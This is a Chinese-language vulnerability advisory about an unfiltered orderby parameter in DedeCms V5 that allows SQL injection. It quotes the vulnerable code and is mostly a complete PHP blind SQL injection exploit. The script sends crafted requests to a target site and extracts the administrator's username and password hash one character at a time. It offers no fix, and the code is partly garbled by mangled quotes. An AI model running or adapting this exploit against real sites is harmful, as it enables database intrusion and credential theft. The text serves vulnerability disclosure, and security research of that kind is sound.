DedeCms V5 orderby参数注射漏洞
<p> 影响版本:</p> <p> DedeCms V5漏洞描述:</p> <p> DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。</p> <p> 在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下</p> <p> -------------------------------------------------------</p> <p> if(empty($orderby)) $orderby = 'pubdate';</p> <p> //重载列表</p> <p> if($dopost=='getlist'){</p> <p> PrintAjaxHead();</p> <p> GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数</p> <p> $dsql->Close();</p> <p> exit();</p> <p> ……</p> <p> function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){</p> <p> global $cfg_phpurl,$cfg_ml;</p> <p> $jobs = array();</p> <p> $start = ($pageno-1) * $pagesize;</p> <p> $dsql->SetQuery("Select * From sec_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");</p> <p> $dsql->Execute();//orderby 带入数据库查询</p> <p> ……</p> <p> ----------------------------------------------------------</p> <p> <*参考</p> <p> http://www.80sec.com/dedecms-sql-injection.html</p> <p> *></p> <p> 测试方法:</p> <p> </p> <p> 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!</p> <p> print_r('</p> <p> --------------------------------------------------------------------------------</p> <p> DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit</p> <p> BY Flyh4t</p> <p> www.wolvez.org</p> <p> Thx for all the members of W.S.T and my friend Oldjun</p> <p> --------------------------------------------------------------------------------</p> <p> ');</p> <p> if ($argc<3) {</p> <p> print_r('</p> <p> --------------------------------------------------------------------------------</p> <p> Usage: php '.$argv.’ host path</p> <p> host: target server (ip/hostname)</p> <p> path: path to DEDEcms</p> <p> Example:</p> <p> php ‘.$argv.’ localhost /</p> <p> ——————————————————————————–</p> <p> ‘);</p> <p> die;</p> <p> }</p> <p> function sendpacketii($packet)</p> <p> {</p> <p> global $host, $html;</p> <p> $ock=fsockopen(gethostbyname($host),’80′);</p> <p> if (!$ock) {</p> <p> echo ‘No response from ‘.$host; die;</p> <p> }</p> <p> fputs($ock,$packet);</p> <p> $html=”;</p> <p> while (!feof($ock)) {</p> <p> $html.=fgets($ock);</p> <p> }</p> <p> fclose($ock);</p> <p> }</p> <p> $host=$argv;</p> <p> $path=$argv;</p> <p> $prefix=”dede_”;</p> <p> $cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;</p> <p> if (($path<>’/') or ($path<>’/'))</p> <p> {echo ‘Error… check the path!’; die;}</p> <p> /*get $prefix*/</p> <p> $packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0rn”;</p> <p> $packet.=”Host: “.$host.”rn”;</p> <p> $packet.=”Cookie: “.$cookie.”rn”;</p> <p> $packet.=”Connection: Closernrn”;</p> <p> sendpacketii($packet);</p> <p> if (eregi(”in your SQL syntax”,$html))</p> <p> {</p> <p> $temp=explode(”From “,$html);</p> <p> $temp2=explode(”member”,$temp);</p> <p> if($temp2)</p> <p> $prefix=$temp2;</p> <p> echo “[+]prefix -> “.$prefix.”n”;</p> <p> }</p> <p> $chars=0;//null</p> <p> $chars=array_merge($chars,range(48,57)); //numbers</p> <p> $chars=array_merge($chars,range(97,102));//a-f letters</p> <p> echo “[~]exploting now,plz waitingrn”;</p> <p> /*get password*/</p> <p> $j=1;$password=”";</p> <p> while (!strstr($password,chr(0)))</p> <p> {</p> <p> for ($i=0; $i<=255; $i++)</p> <p> {</p> <p> if (in_array($i,$chars))</p> <p> {</p> <p> $sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;</p> <p> $packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0rn”;</p> <p> $packet.=”Host: “.$host.”rn”;</p> <p> $packet.=”Cookie: “.$cookie.”rn”;</p> <p> $packet.=”Connection: Closernrn”;</p> <p> sendpacketii($packet);</p> <p> if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”rn”;break;}</p> <p> }</p> <p> if ($i==255) {die(”Exploit failed…”);}</p> <p> }</p> <p> $j++;</p> <p> }</p> <p> /*get userid*/</p> <p> $j=1;$admin=”";</p> <p> while (!strstr($admin,chr(0)))</p> <p> {</p> <p> for ($i=0; $i<=255; $i++)</p> <p> {</p> <p> $sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;</p> <p> $packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0rn”;</p> <p> $packet.=”Host: “.$host.”rn”;</p> <p> $packet.=”Cookie: “.$cookie.”rn”;</p> <p> $packet.=”Connection: Closernrn”;</p> <p> sendpacketii($packet);</p> <p> if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”rn”;break;}</p> <p> if ($i==255) {die(”Exploit failed…”);}</p> <p> }</p> <p> $j++;</p> <p> }</p> <p> print_r(’</p> <p> ——————————————————————————–</p> <p> [+]userid -> ‘.$admin.’</p> <p> [+]pwd(md5 24位) -> ‘.$password.’</p> <p> ——————————————————————————–</p> <p> ‘);</p> <p> function is_hash($hash)</p> <p> {</p> <p> if (ereg(”^{24}”,trim($hash))) {return true;}</p> <p> else {return false;}</p> <p> }</p> <p> if (is_hash($password)) {echo “Exploit succeeded…”;}</p> <p> else {echo “Exploit failed…”;}</p> <p> ?>爱安全建议:</p> <p> 暂无</p> <p> http://www.dedecms.com// aianquan.com </p> <p> </p> <p>(本文由责任编辑 pasu 整理发布)</p> <p> </p>
頁:
[1]